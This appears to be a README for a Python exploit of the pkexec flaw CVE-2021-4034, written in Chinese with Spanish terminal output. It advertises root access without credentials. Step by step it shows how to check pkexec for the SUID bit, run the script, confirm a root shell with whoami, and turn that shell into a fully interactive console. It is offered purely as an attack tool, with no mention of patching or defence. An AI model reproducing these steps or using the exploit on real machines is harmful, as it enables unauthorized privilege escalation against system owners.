CVE-2021-4034 (pkexec) 使用此Python脚本利用pkexec文件中的漏洞,无需提供凭据即可获得root访问权限
· 检测二进制文件是否具有SUID权限,在这种情况下容易受到攻击
usuario@gatogamer $ ls -la /usr/bin/pkexec
.rwsr-xr-x 1 root root /usr/bin/pkexec
usuario@gatogamer $
· 运行exploit以获得root访问权限,在这种情况下只需用python3执行它,完成后你将获得一个root shell
usuario@gatogamer $ python3 CVE-2021-4034.py
[+] Iniciando el exploit
[+] Exploit Completado
# whoami
root
#
· 作为补充,你可以更改TERM的值,可以是'xterm'或'xterm-256color'以获得更好的外观,此外还可以执行不同的shell,无论是'bash'还是'zsh',现在我们拥有了一个完全交互的控制台
# export TERM=xterm-256color
# zsh
root@gatogamer $